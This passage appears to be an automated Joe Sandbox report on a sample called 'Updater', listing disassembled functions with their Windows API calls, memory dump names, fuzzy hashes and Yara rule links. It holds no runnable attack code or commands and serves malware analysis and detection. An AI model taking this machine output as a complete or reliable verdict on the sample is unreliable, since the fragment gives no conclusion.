Instruction Fuzzy Hash: D1219170A083059F9710DF28C8808AB77E8FE59364F104A1DF8AA873E2DB34DD46CB56

Function 007630A0 Relevance: 6.1, APIs: 4, Instructions: 75COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EC), ref: 00763128
SetWindowLongW.USER32(?,000000EC,00000000), ref: 00763142
SetWindowLongW.USER32(?,000000EC,00000000), ref: 00763150
SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 0076315E

Memory Dump Source

Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true

Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd

Similarity

API ID: Window$Long$AttributesLayered
String ID:
API String ID: 2169480361-0
Opcode ID: 53e197946d6850cb255dd4fb69acac8b40eba040b758b3a77c8cddcd7580c25b
Instruction ID: c2cef15ddf969f90381eea9206566a66ebf2ce862507879dadbf53b14dcd46f3
Opcode Fuzzy Hash: 53e197946d6850cb255dd4fb69acac8b40eba040b758b3a77c8cddcd7580c25b
Instruction Fuzzy Hash: 59212130608615AFD7149B14CC44FAA7B99AF86324F188119F8278B392CB79EE42CB84

Function 007387B9 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 71stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00739C5A: lstrlenW.KERNEL32(?,00000002,000000FF,?,?,?,007387CE,?,000000FF,?,00739624,00000000,?,0000001C,?,?), ref: 00739C69
Part of subcall function 00739C5A: lstrcpyW.KERNEL32(00000000,?,?,007387CE,?,000000FF,?,00739624,00000000,?,0000001C,?,?,00000000), ref: 00739C8F
Part of subcall function 00739C5A: lstrcmpiW.KERNEL32(00000000,?,007387CE,?,000000FF,?,00739624,00000000,?,0000001C,?,?), ref: 00739CC0

lstrlenW.KERNEL32(?,00000002,000000FF,?,000000FF,?,00739624,00000000,?,0000001C,?,?,00000000), ref: 007387E7
lstrcpyW.KERNEL32(00000000,?,?,00739624,00000000,?,0000001C,?,?,00000000), ref: 0073880D
lstrcmpiW.KERNEL32(00000002,cdecl,?,00739624,00000000,?,0000001C,?,?,00000000), ref: 00738848

Strings

cdecl, xrefs: 0073883F

Memory Dump Source

Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true

Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd

Similarity

API ID: lstrcmpilstrcpylstrlen
String ID: cdecl
API String ID: 4031866154-3896280584
Opcode ID: 48ee46041acea98dc9def045adac475f7f334bfc8e75bb6327986af2fd5b14cb
Instruction ID: 3469486df0346f1e82a70e0f4c4f8076b5039fdb0a7044586a4cc86d0f5c6a53
Opcode Fuzzy Hash: 48ee46041acea98dc9def045adac475f7f334bfc8e75bb6327986af2fd5b14cb
Instruction Fuzzy Hash: 3711037A210305EBEB145F39C8449BA77E9FF89750F90802AFA06C7251EF799801C3A1

Function 00732B43 Relevance: 6.1, APIs: 4, Instructions: 57windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,000000B0,?,?), ref: 00732B63
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00732B75
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00732B8B
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00732BA6

Memory Dump Source

Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true

Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 9229d08ca7dee4539cd8920f8a7120ba1b5fbda8fe7ea36631e4ac27af6248fc
Instruction ID: b5af84b31cece361a11d7c02555b1ab328f6e888e02f9ee1c7d6dede1c7b166e
Opcode Fuzzy Hash: 9229d08ca7dee4539cd8920f8a7120ba1b5fbda8fe7ea36631e4ac27af6248fc
Instruction Fuzzy Hash: D711237A900228FFEB109FA4CC85FADFB78FB08750F200191EA00B7291DA716E11DB94

Function 0073F018 Relevance: 6.1, APIs: 4, Instructions: 56synchronizationthreadwindowCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 0073F03F
MessageBoxW.USER32(?,?,?,?), ref: 0073F072
WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 0073F088
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 0073F08F

Memory Dump Source

Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true

Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd

Similarity

API ID: CloseCurrentHandleMessageObjectSingleThreadWait
String ID:
API String ID: 2880819207-0
Opcode ID: cf29aae51143de756f75e83df22df149336a84321c7044ec2892feee95b28256
Instruction ID: 24c5ae8b682dacaf0197ecc29b30f7a6d3c03e6702bc1526e04682bf9a8cc140
Opcode Fuzzy Hash: cf29aae51143de756f75e83df22df149336a84321c7044ec2892feee95b28256
Instruction Fuzzy Hash: 90110C76E00258BFDB149FAC9C089AB7FADEB46350F048265F815D3292D6BD8D0187A5

Function 0149E05B Relevance: 6.1, APIs: 4, Instructions: 55memoryCOMMON

Download Yara Rule

APIs

RtlInitializeCriticalSection.NTDLL(014BBB35), ref: 0149E074
RtlEnterCriticalSection.NTDLL(014BBB35), ref: 0149E087
LocalAlloc.KERNEL32(00000000,00000FF8,00000000,0149E125), ref: 0149E0B1
RtlLeaveCriticalSection.NTDLL(014BBB35), ref: 0149E11F

Memory Dump Source

Source File: 00000023.00000002.2238771515.000000000149A000.00000040.00000020.00020000.00000000.sdmp, Offset: 0149A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_149a000_Updater.jbxd

Similarity

API ID: CriticalSection$AllocEnterInitializeLeaveLocal
String ID:
API String ID: 730355536-0
Opcode ID: db28ae592cbb4d2fabd3dd9cff963986afdfac9e6cf9b40811c5e1de92dd3de3
Instruction ID: 413aa8a26a641aaabcf8eecd5c76397b5ff0b7bf54c20ae05bb7da2d6b1b30da
Opcode Fuzzy Hash: db28ae592cbb4d2fabd3dd9cff963986afdfac9e6cf9b40811c5e1de92dd3de3
Instruction Fuzzy Hash: 641190B0A08244EBDB35EF9AD895A997FA4E769300F10846FA1549BBB9C6745800D721

Function 006FD06B Relevance: 6.1, APIs: 4, Instructions: 55threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNEL32(00000000,?,006FCE98,00000000,00000004,00000000), ref: 006FD0B7
GetLastError.KERNEL32 ref: 006FD0C3
__dosmaperr.LIBCMT ref: 006FD0CA
ResumeThread.KERNEL32(00000000), ref: 006FD0E8

Memory Dump Source

Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true

Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd

Similarity

API ID: Thread$CreateErrorLastResume__dosmaperr
String ID:
API String ID: 173952441-0
Opcode ID: 14a605520f9bfbadf051d3b948ca2732e804e445f8c72d8850469a280fa477f1
Instruction ID: 115fd9c74f246ea1524812726e53b68d1566a446cb137f0fe6dd5518ef403626
Opcode Fuzzy Hash: 14a605520f9bfbadf051d3b948ca2732e804e445f8c72d8850469a280fa477f1
Instruction Fuzzy Hash: 8401F93251020CBBCB206FA5DC09BBB7B6BDF41331F204319FA14862E0DFB59802C6A4

Function 0149E05D Relevance: 6.1, APIs: 4, Instructions: 54memoryCOMMON

Download Yara Rule

APIs

RtlInitializeCriticalSection.NTDLL(014BBB35), ref: 0149E074
RtlEnterCriticalSection.NTDLL(014BBB35), ref: 0149E087
LocalAlloc.KERNEL32(00000000,00000FF8,00000000,0149E125), ref: 0149E0B1
RtlLeaveCriticalSection.NTDLL(014BBB35), ref: 0149E11F

Memory Dump Source

Source File: 00000023.00000002.2238771515.000000000149A000.00000040.00000020.00020000.00000000.sdmp, Offset: 0149A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_149a000_Updater.jbxd

Similarity

API ID: CriticalSection$AllocEnterInitializeLeaveLocal
String ID:
API String ID: 730355536-0
Opcode ID: 67fb67451a323f0ff647a9f79a6de8dd443e3e9b64c2c7fcfb99847a9cbb6beb
Instruction ID: 3cfb7784b846432ab2fb821873fda607e93391c1fd2d9f1fadab74833f65b126
Opcode Fuzzy Hash: 67fb67451a323f0ff647a9f79a6de8dd443e3e9b64c2c7fcfb99847a9cbb6beb
Instruction Fuzzy Hash: B011B2B0E0C244EBDB35EFDAD895B997FA4E769300F10846F91549BBB9C6745800D721

Function 0073F6C9 Relevance: 6.1, APIs: 4, Instructions: 54COMMON

Download Yara Rule

APIs

Part of subcall function 0073EC33: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,0073DCD6,?), ref: 0073EC50

GetFileAttributesW.KERNEL32(?,00000000,?,0073F417,?,?,?), ref: 0073F6F4
RemoveDirectoryW.KERNEL32(?,?,0073F417,?,?,?), ref: 0073F70E
_wcslen.LIBCMT ref: 0073F71B
SHFileOperationW.SHELL32(?,?,0073F417,?,?,?), ref: 0073F759

Memory Dump Source

Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true

Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd

Similarity

API ID: File$AttributesDirectoryFullNameOperationPathRemove_wcslen
String ID:
API String ID: 3674178553-0
Opcode ID: e2ca54b41436e1cba02f8d8cb3ebc30d8df5273dd761588ea820a120ebcf3b3e
Instruction ID: 31d9321e0d4a569e4ef32ba5c14e6f8b83fdc8de4c0c91b4f7bfc2cdfb38a6b8
Opcode Fuzzy Hash: e2ca54b41436e1cba02f8d8cb3ebc30d8df5273dd761588ea820a120ebcf3b3e
Instruction Fuzzy Hash: 47119E70E0020D8BDF11DFB8D909AEDB7B9BF08340F5405BAE419D3282EB7896848B50

Function 006E4570 Relevance: 6.1, APIs: 4, Instructions: 53windowCOMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 006E45AE
GetStockObject.GDI32(00000011), ref: 006E45C2
SendMessageW.USER32(00000000,00000030,00000000), ref: 006E45CC

Memory Dump Source

Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true

Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd

Similarity

API ID: CreateMessageObjectSendStockWindow
String ID:
API String ID: 3970641297-0
Opcode ID: 2372cc4636c199ec086123325c1ed6a2aedfa196e3fb0db90963f695970ab15e
Instruction ID: ebb3fc09bd1dfcdf3fdc5594a4837a5dedac8034472ef3624dd29e911e12f807
Opcode Fuzzy Hash: 2372cc4636c199ec086123325c1ed6a2aedfa196e3fb0db90963f695970ab15e
Instruction Fuzzy Hash: 6A11AD72602698BFDF124FA1DC44EEA7B6EEF08394F154115FA0592120DB75DC60EBA0

Function 0073831E Relevance: 6.1, APIs: 4, Instructions: 52registryCOMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(?,?,00000104,00000000), ref: 00738339
LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 00738351
RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 00738366
RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 00738384

Memory Dump Source

Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true

Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd

Similarity

API ID: Type$Register$FileLoadModuleNameUser
String ID:
API String ID: 1352324309-0
Opcode ID: d86241fc9821fcc6db1046f65dbc8d7d0d064b4188e57d83578b2f0f2135c7fd
Instruction ID: 6384b2eeb04dab9d200c6b5a645670ba7e5168c4376a18e36c183b80805c5a91
Opcode Fuzzy Hash: d86241fc9821fcc6db1046f65dbc8d7d0d064b4188e57d83578b2f0f2135c7fd
Instruction Fuzzy Hash: D7118EB16123049FF7208F50DC08F9A7BF8EB00B00F108569FA16D6251EBB8E904AB52

Function 00702F4A Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00000000,00000000,?,00702EF1,?,00000000,00000000,00000000,?,00703162,00000006,FlsSetValue), ref: 00702F7C
GetLastError.KERNEL32(?,00702EF1,?,00000000,00000000,00000000,?,00703162,00000006,FlsSetValue,0077311C,00773124,00000000,00000364,?,00702D1D), ref: 00702F88
LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00702EF1,?,00000000,00000000,00000000,?,00703162,00000006,FlsSetValue,0077311C,00773124,00000000), ref: 00702F96

Memory Dump Source

Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true

Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID:
API String ID: 3177248105-0
Opcode ID: c619f0ec4375d7af5d7c356b58c7b4f067406bac2a21126d74aa749e4ddec188
Instruction ID: a764126bb7de9bbe763a6121e09d49c7f79d1d1bc5ee23cc2b4387293e6ee878
Opcode Fuzzy Hash: c619f0ec4375d7af5d7c356b58c7b4f067406bac2a21126d74aa749e4ddec188
Instruction Fuzzy Hash: 5A012433715323DBC7314A399C08A5677E8AF05BE0B214720F906D71C2C629EC0286E4

Function 007687CE Relevance: 6.0, APIs: 4, Instructions: 47COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 007687ED
ScreenToClient.USER32(?,?), ref: 00768805
ScreenToClient.USER32(?,?), ref: 00768829
InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00768844

Memory Dump Source

Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true

Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd

Similarity

API ID: ClientRectScreen$InvalidateWindow
String ID:
API String ID: 357397906-0
Opcode ID: c8ab9e8974c53394eed116f1f3f23c82bc64980a1fe4b853e1e4434b24415073
Instruction ID: ed9316ded948ee25cb36b39729d69c0865e6450e0ecd6149db943128b5868901
Opcode Fuzzy Hash: c8ab9e8974c53394eed116f1f3f23c82bc64980a1fe4b853e1e4434b24415073
Instruction Fuzzy Hash: CB1143B9D0020AEFDB51CF99C8849EEBBF9FB18310F108166E915E3210D775AA548F55

Function 014A3F69 Relevance: 6.0, APIs: 4, Instructions: 43timefileCOMMON

Download Yara Rule

APIs

FindNextFileA.KERNEL32(?,?), ref: 014A3F7A
GetLastError.KERNEL32(?,?), ref: 014A3F83
FileTimeToLocalFileTime.KERNEL32(?), ref: 014A3F99
FileTimeToDosDateTime.KERNEL32(?,?,?), ref: 014A3FA8

Memory Dump Source

Source File: 00000023.00000002.2238771515.000000000149A000.00000040.00000020.00020000.00000000.sdmp, Offset: 0149A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_149a000_Updater.jbxd

Similarity

API ID: FileTime$DateErrorFindLastLocalNext
String ID:
API String ID: 2103556486-0
Opcode ID: f218713af8d7f5f400ed25a2b579a45ca9935611dad86f3b5450e84def11e28b
Instruction ID: 34958824514c5199d4c0485f400c739042345eb1d986ae9af7ea1848e643cd42
Opcode Fuzzy Hash: f218713af8d7f5f400ed25a2b579a45ca9935611dad86f3b5450e84def11e28b
Instruction Fuzzy Hash: 3A0162766001019F8B04DFA9C8C1D8773ACAB3825034145A7FD45CF25AF770D95087B0

Function 00734DB6 Relevance: 6.0, APIs: 4, Instructions: 42windowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00734DD0
SendMessageW.USER32(?,0000000C,00000000,?), ref: 00734DE4
GetParent.USER32 ref: 00734DF9
InvalidateRect.USER32(00000000,?,00000000,00000001,?,0000000C,00000000,?,?,00000000,00000000,00000000,00000002,00001388,?), ref: 00734E00

Memory Dump Source

Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true

Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd

Similarity

API ID: MessageSend$InvalidateParentRectTimeout
String ID:
API String ID: 3648793173-0
Opcode ID: 34b68b5bdb57c0ac2713c1bdc7118134d4355ed4d632c22ac53828d59723f480
Instruction ID: 308666b5afe2d763cf596f4497b823ce3cc602e8423bc22fcf96503ee99382a6
Opcode Fuzzy Hash: 34b68b5bdb57c0ac2713c1bdc7118134d4355ed4d632c22ac53828d59723f480
Instruction Fuzzy Hash: 35F06D35640344FBFB345F67DC0DF977FACEB96B80F008159F946860A1CAAA9C04DAA1

Function 0076924C Relevance: 6.0, APIs: 4, Instructions: 31COMMON

Download Yara Rule

APIs

Part of subcall function 006E3B38: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 006E3B92
Part of subcall function 006E3B38: SelectObject.GDI32(?,00000000), ref: 006E3BA1
Part of subcall function 006E3B38: BeginPath.GDI32(?), ref: 006E3BB8
Part of subcall function 006E3B38: SelectObject.GDI32(?,00000000), ref: 006E3BE1

MoveToEx.GDI32(?,00000000,00000000,00000000), ref: 00769270
LineTo.GDI32(?,?,?), ref: 0076927D
EndPath.GDI32(?), ref: 0076928D
StrokePath.GDI32(?), ref: 0076929B

Memory Dump Source

Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true

Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd

Similarity

API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
String ID:
API String ID: 1539411459-0
Opcode ID: e6911fa87d2a287e12dc119c1811eb9e40221bfda50f878f86f7a9d0156bb480
Instruction ID: bd63b1ff8a53c70b94f9506dd02f359051c291ff7f42b01eb45489f8613500ae
Opcode Fuzzy Hash: e6911fa87d2a287e12dc119c1811eb9e40221bfda50f878f86f7a9d0156bb480
Instruction Fuzzy Hash: 2DF05431541358BBDB225F559C0DFCE3F596F1A721F04C000FA12610E187BD59168F9D

Function 006F105B Relevance: 6.0, APIs: 4, Instructions: 26timethreadCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 006F106D
GetCurrentThreadId.KERNEL32 ref: 006F107C
GetCurrentProcessId.KERNEL32 ref: 006F1085
QueryPerformanceCounter.KERNEL32(?), ref: 006F1092

Memory Dump Source

Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true

Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd

Similarity

API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
String ID:
API String ID: 2933794660-0
Opcode ID: 42836993ecd335b3446fb1d89667c7b831a9c935434fc32c1dace28f1943ed1c
Instruction ID: f6efbb537dd0dd1d790c72404355e8a4ebb9542aa0694ad51bcafdd4f3b1912d
Opcode Fuzzy Hash: 42836993ecd335b3446fb1d89667c7b831a9c935434fc32c1dace28f1943ed1c
Instruction Fuzzy Hash: 8EF0AF70D2020CEBCB14DBF5D949A9EBBF8FF08301F518496E802E7210E7B8AB049B55

Function 006E4A5F Relevance: 6.0, APIs: 4, Instructions: 24COMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000008), ref: 006E4A7B
SetTextColor.GDI32(?,?), ref: 006E4A85
SetBkMode.GDI32(?,00000001), ref: 006E4A98
GetStockObject.GDI32(00000005), ref: 006E4AA0

Memory Dump Source

Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true

Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd

Similarity

API ID: Color$ModeObjectStockText
String ID:
API String ID: 4037423528-0
Opcode ID: 74b4aec09841941cc3cf575750e011e160bd8b3d03e1a172abb77f8ffcba88bd
Instruction ID: 1c67e9f255a5498a1f8cf07d1d879f76c487642d40f4ef681e12846f89af11ba
Opcode Fuzzy Hash: 74b4aec09841941cc3cf575750e011e160bd8b3d03e1a172abb77f8ffcba88bd
Instruction Fuzzy Hash: F2E0A031A81348AADB315B35BC08BD83B21AB12332F04C319FABA440E0CBB609509B11

Function 0073273F Relevance: 6.0, APIs: 4, Instructions: 22threadCOMMON

Download Yara Rule

APIs

GetCurrentThread.KERNEL32 ref: 00732748
OpenThreadToken.ADVAPI32(00000000,?,?,?,007322E5), ref: 0073274F
GetCurrentProcess.KERNEL32(00000028,?,?,?,?,007322E5), ref: 0073275C
OpenProcessToken.ADVAPI32(00000000,?,?,?,007322E5), ref: 00732763

Memory Dump Source

Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true

Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd

Similarity

API ID: CurrentOpenProcessThreadToken
String ID:
API String ID: 3974789173-0
Opcode ID: 5b6dc2aabaff299325f4318df08c7e54cb7a54bd6172be3ae9bf5ba17549169d
Instruction ID: 5cef51bdbcc221c814ae42cd9baa60bee1f5b9ece30b5d389b17c7b473727a37
Opcode Fuzzy Hash: 5b6dc2aabaff299325f4318df08c7e54cb7a54bd6172be3ae9bf5ba17549169d
Instruction Fuzzy Hash: 81E08631B11311ABE7301FB19E0CB463B6CAF44791F118414F247C9095D6FC8842C759

